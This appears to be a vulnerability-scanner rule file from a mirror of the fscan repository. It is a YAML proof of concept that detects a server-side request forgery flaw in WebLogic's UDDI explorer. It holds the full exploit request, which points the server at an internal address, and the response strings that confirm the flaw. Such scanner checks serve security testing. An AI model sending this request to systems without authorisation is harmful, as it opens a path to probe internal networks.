mirror of https://github.com/qwqdanchun/fscan.git
12 lines
712 B
YAML
12 lines
712 B
YAML
name: poc-yaml-weblogic-ssrf
|
|
rules:
|
|
- method: GET
|
|
path: >-
|
|
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700
|
|
headers:
|
|
Cookie: >-
|
|
publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|;
|
|
follow_redirects: false
|
|
expression: >-
|
|
response.status == 200 && (response.body.bcontains(b"'127.1.1.1', port: '700'") || response.body.bcontains(b"Socket Closed"))
|